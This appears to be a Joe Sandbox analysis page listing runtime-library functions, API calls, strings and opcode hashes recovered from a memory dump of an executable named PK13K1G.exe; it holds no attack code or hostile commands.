Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 00a137d2b87deccd6ab7f5337490cbbbb266a9d265a402763220c533b8dc0241
Instruction ID: 9fd5ac2147c9fe431dcf50b9165abaa5fe9e77187372283fc645dd3e348b7ad8
Opcode Fuzzy Hash: 00a137d2b87deccd6ab7f5337490cbbbb266a9d265a402763220c533b8dc0241
Instruction Fuzzy Hash:

Function 00029726 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00029726

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 9e49cf61ec6a4382068d86cef6c92e67125e8e2acd160f9eaf5c76b594855be2
Instruction ID: 927987b08624d1437958efa9661f90a9d44ca169d35ccf5dc69b5906ea0327d1
Opcode Fuzzy Hash: 9e49cf61ec6a4382068d86cef6c92e67125e8e2acd160f9eaf5c76b594855be2
Instruction Fuzzy Hash: 7AA00270542601CB67454F355A45719779D5B8559570544556605C5160DB3C44546B01

Function 0002F878 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(005105A0,005105A0,00000000,7FFFFFFF,?,0002F863,005105A0,005105A0,00000000,005105A0,?,?,?,?,005105A0,00000000), ref: 0002F91E
__alloca_probe_16.LIBCMT ref: 0002F9D9
__alloca_probe_16.LIBCMT ref: 0002FA68
__freea.LIBCMT ref: 0002FAB3
__freea.LIBCMT ref: 0002FAB9
__freea.LIBCMT ref: 0002FAEF
__freea.LIBCMT ref: 0002FAF5
__freea.LIBCMT ref: 0002FB05

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 8b826ab13b830c788c68ac207d7168215ec609165349636009a43b9e132db0be
Instruction ID: 51dfea5bfd603e93b58d898f3a802ba9085fcb5a5713615ddfa0642d4de83942
Opcode Fuzzy Hash: 8b826ab13b830c788c68ac207d7168215ec609165349636009a43b9e132db0be
Instruction Fuzzy Hash: ED71C572A002276BDF219F54EC52BFF77F99F45794F290079E908A7282DB359C408791

Function 00025C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00025CB7
___except_validate_context_record.LIBVCRUNTIME ref: 00025CBF
_ValidateLocalCookies.LIBCMT ref: 00025D48
__IsNonwritableInCurrentImage.LIBCMT ref: 00025D73
_ValidateLocalCookies.LIBCMT ref: 00025DC8

Strings

csm, xrefs: 00025D5D

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: c4d3dbb592c06dbf65aadb22b6f6863c29df14c3de64ea07e633bf9479166bf1
Instruction ID: edb36ab811e3105258ddef89d81789626302b5e82d836d7ca7225e7782b4e102
Opcode Fuzzy Hash: c4d3dbb592c06dbf65aadb22b6f6863c29df14c3de64ea07e633bf9479166bf1
Instruction Fuzzy Hash: 7141E534A006289FCF20DF68EC89A9EBBF5EF45325F148055E9185B352D731A905CB95

Function 0002489F Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000248A5
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 000248B3
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 000248C4

Strings

GetSystemTimePreciseAsFileTime, xrefs: 000248AD
kernel32.dll, xrefs: 000248A0
GetTempPath2W, xrefs: 000248B9

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1047828073
Opcode ID: 344e6963716681d7935098fc8e378208424937aadecbaadbf9c03027b3c2299f
Instruction ID: 80dd44e93362fa8b479edf988b36292de8467f1eceaa91200481f6eb16c1b03c
Opcode Fuzzy Hash: 344e6963716681d7935098fc8e378208424937aadecbaadbf9c03027b3c2299f
Instruction Fuzzy Hash: E2D0A731682B20AFA3879F717C0D84A3EACEB04342701C051F700D7261DBBC05048F90

Function 00027F49 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00027F40,00025A6B,00025180), ref: 00027F57
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00027F65
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00027F7E
SetLastError.KERNEL32(00000000,00027F40,00025A6B,00025180), ref: 00027FD0

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e44ef12d12fea574415a8cb467fdc4a135530f7654f6d083eabdc030375f1c1f
Instruction ID: 505fd3ab3a1c4b07a800206f0f5217b21834afab978b858ee6e321c456d15a68
Opcode Fuzzy Hash: e44ef12d12fea574415a8cb467fdc4a135530f7654f6d083eabdc030375f1c1f
Instruction Fuzzy Hash: 3101DF3260C3326EF6A72774BDC58AA6BA8DB47774720023AF418854F2EF154C129251

Function 000287D9 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 000288F8
CallUnexpected.LIBVCRUNTIME ref: 00028B71

Strings

csm, xrefs: 00028883
csm, xrefs: 00028816
csm, xrefs: 0002892F

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2673424686-393685449
Opcode ID: 65daec67296db43623abac671113020f5f2801744c8372caab24096663386963
Instruction ID: e9b8b11500b991d778fdc125577be05b791a7915b1afc6bf35b1e247bf97e8fb
Opcode Fuzzy Hash: 65daec67296db43623abac671113020f5f2801744c8372caab24096663386963
Instruction Fuzzy Hash: D6B19F79802229EFDF55DFA4E8819EEB7B5FF04310F54815AF8056B202DB31DA51CB92

Function 0002C2C4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe, xrefs: 0002C2E0

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe
API String ID: 0-1867477429
Opcode ID: 63cc6c183ea949bcae2ba1575e970c04373a595a062d522dc44adec933b682b7
Instruction ID: 3786ca4e53d7cf8c2a69319a057405de0aab944ae9e17e36c26d1e172bf8b074
Opcode Fuzzy Hash: 63cc6c183ea949bcae2ba1575e970c04373a595a062d522dc44adec933b682b7
Instruction Fuzzy Hash: 9C21AE71600225AFEB60EFB5EC81DAF77A9AF053647108E15F819D7152DB31EE008BA0

Function 00026A60 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,7DBFEC36,?,?,00000000,00031B77,000000FF,?,00026B21,00000002,?,00026BBD,00027DE9), ref: 00026A95
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00026AA7
FreeLibrary.KERNEL32(00000000,?,?,00000000,00031B77,000000FF,?,00026B21,00000002,?,00026BBD,00027DE9), ref: 00026AC9

Strings

mscoree.dll, xrefs: 00026A8E
CorExitProcess, xrefs: 00026A9F

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2d520dbcd38db49bf2079f21c9032c7e4a51f234f3c0808ed8268a32843ab31b
Instruction ID: 309e9fc2df16b2332a99de826411d685e8680f6d1c43f46c67c333b09b794a4c
Opcode Fuzzy Hash: 2d520dbcd38db49bf2079f21c9032c7e4a51f234f3c0808ed8268a32843ab31b
Instruction Fuzzy Hash: 6401A271944669BFDB128F40DC0AFAEB7FCFB04B11F044126F812A22A0DB799904CA80

Function 000246F6 Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0002470A
AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00031B20,000000FF,?,00023552), ref: 00024729
AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00031B20,000000FF,?,00023552), ref: 00024757
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00031B20,000000FF,?,00023552), ref: 000247B2
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00031B20,000000FF,?,00023552), ref: 000247C9

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: AcquireExclusiveLock$CurrentThread
String ID:
API String ID: 66001078-0
Opcode ID: 66dc06316755e55e03c42bdb7f74d752f9e8e9b23e36d3d5d7abb796136cbe06
Instruction ID: 24e61719ee299ef43957bf01856469518ab067cc29d7b2aff4d4500f21730e07
Opcode Fuzzy Hash: 66dc06316755e55e03c42bdb7f74d752f9e8e9b23e36d3d5d7abb796136cbe06
Instruction Fuzzy Hash: CA418D34918626DFCB61CF65E8849AAF3F9FF06310B10892AD46AD7A41DB30F944CF60

Function 0002D200 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0002D29C,00000000,?,0003B728,?,?,?,0002D1D3,00000004,InitializeCriticalSectionEx,00033740,00033748), ref: 0002D20D
GetLastError.KERNEL32(?,0002D29C,00000000,?,0003B728,?,?,?,0002D1D3,00000004,InitializeCriticalSectionEx,00033740,00033748,00000000,?,00028E2C), ref: 0002D217
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0002D23F

Strings

api-ms-, xrefs: 0002D224

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: b71cc081a7842325139a4dcfba19f2fde33afd16e7fb573ca5d5125b0190d193
Instruction ID: f7d1a135226f5e70ebe0c00525abf9ed99070e2d087d839760a17fc32e665574
Opcode Fuzzy Hash: b71cc081a7842325139a4dcfba19f2fde33afd16e7fb573ca5d5125b0190d193
Instruction Fuzzy Hash: C1E01A30684304B6EB622B60EC46B693BA8AB50B51F148461FE0CE80A1DBB5E9989684

Function 0002DCA8 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(7DBFEC36,00000000,00000000,?), ref: 0002DD0B

Part of subcall function 0002C8A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0002D6D0,?,00000000,-00000008), ref: 0002C902

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0002DF5D
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0002DFA3
GetLastError.KERNEL32 ref: 0002E046

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: e1165a182c9c23d8a90b283f034943c952afbe203ee2a5db49dffd27a7fb329f
Instruction ID: beec9dc309c982baafcb297ff2a3b6f33c519cba5b6d678a05b2bf70d4839c8d
Opcode Fuzzy Hash: e1165a182c9c23d8a90b283f034943c952afbe203ee2a5db49dffd27a7fb329f
Instruction Fuzzy Hash: 20D17A75D002689FCF15CFA8E9C09EEBBF9EF09314F28416AE556EB251D630AD42CB50

Function 00028500 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 000285C7
___AdjustPointer.LIBCMT ref: 000285EA
___AdjustPointer.LIBCMT ref: 00028686

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 147990d440e0d20ab71cfe5207a66254f9d7950eebe8bc3b489c79fb97e9a7b8
Instruction ID: 5eed6d0b9e405f693cd78dc0ee931911f5b4c02431ef8bfd4abc0d90b3b60011
Opcode Fuzzy Hash: 147990d440e0d20ab71cfe5207a66254f9d7950eebe8bc3b489c79fb97e9a7b8
Instruction Fuzzy Hash: EC51D27A6036369FDB298F14F849BBAB7E4EF04711F14856DE90557292EB31EC40CB50

Function 0002BD28 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 0002C8A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0002D6D0,?,00000000,-00000008), ref: 0002C902

GetLastError.KERNEL32(?,?,?,00000000,00000000,?,0002C0CE,?,?,?,00000000), ref: 0002BD8C
__dosmaperr.LIBCMT ref: 0002BD93
GetLastError.KERNEL32(00000000,0002C0CE,?,?,00000000,?,?,?,00000000,00000000,?,0002C0CE,?,?,?,00000000), ref: 0002BDCD
__dosmaperr.LIBCMT ref: 0002BDD4

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: a0b8ecfec30940df7a584a558c6b2b5e5aed1c1fc14952b13a23cc0fe41ff147
Instruction ID: 54eefe4677cf975c23c6044d5cc6957441ff6f4a5ce37029d5c8d6ae12a79c9a
Opcode Fuzzy Hash: a0b8ecfec30940df7a584a558c6b2b5e5aed1c1fc14952b13a23cc0fe41ff147
Instruction Fuzzy Hash: 5021D471600226AFDB20AF66EC81DEFB7ADFF043647108819F96997111EB30EC008B91

Function 0002C99D Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0002C9A5

Part of subcall function 0002C8A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0002D6D0,?,00000000,-00000008), ref: 0002C902

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0002C9DD
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0002C9FD

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: de608b7a6716675c18c36d10e5cdc6a7afc4a469cb2b6e0df894fb416dec3d3f
Instruction ID: 2a6e2411643872b6d262c90f69c70b3a8d5a881a8489cce7e65fc4c06bc0a3ce
Opcode Fuzzy Hash: de608b7a6716675c18c36d10e5cdc6a7afc4a469cb2b6e0df894fb416dec3d3f
Instruction Fuzzy Hash: 8C11C4E1905639BF7A21B7B1BC8DCFF299CEF553A83100065F906D2102EE248D4192B2

Function 00021E00 Relevance: 6.1, APIs: 4, Instructions: 53threadCOMMON

Download Yara Rule

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 00021E2D
GetCurrentThreadId.KERNEL32 ref: 00021E3B
std::_Throw_Cpp_error.LIBCPMT ref: 00021E54
std::_Throw_Cpp_error.LIBCPMT ref: 00021E93

Memory Dump Source

Source File: 00000006.00000002.2397633900.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.2397606537.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397698821.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397776048.000000000003A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397855440.000000000003B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2397945380.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.2398038278.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_PK13K1G.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$CurrentThread
String ID:
API String ID: 2261580123-0
Opcode ID: 3ffe58eddf958ac7212d1d6a446c64a13077ece37939c7a13880de1231eceeb6
Instruction ID: 9b9805f8beb9767cb4246bab81791bd9e11691841fb04f9090197f8e87b87e45
Opcode Fuzzy Hash: 3ffe58eddf958ac7212d1d6a446c64a13077ece37939c7a13880de1231eceeb6
Instruction Fuzzy Hash: 6421B6B4E042199FCB04EFA8E5857ADFBF1EF58300F02845DE859A7392D7389A41CB51

Function 0002FD00 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0002F4A1,00000000,00000001,00000000,?,?,0002E09A,?,00000000,00000000), ref: 0002FD17
GetLastError.KERNEL32(?,0002F4A1,00000000,00000001,00000000,?,?,0002E09A,?,00000000,00000000,?,?,?,0002D9E0,00000000), ref: 0002FD23

Part of subcall function 0002FD74: CloseHandle.KERNEL32(FFFFFFFE,0002FD33,?,0002F4A1,00000000,00000001,00000000,?,?,0002E09A,?,00000000,00000000,?,?), ref: 0002FD84

___initconout.LIBCMT ref: 0002FD33

Part of subcall function 0002FD55: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0002FCF1,0002F48E,?,?,0002E09A,?,00000000,00000000,?), ref: 0002FD68

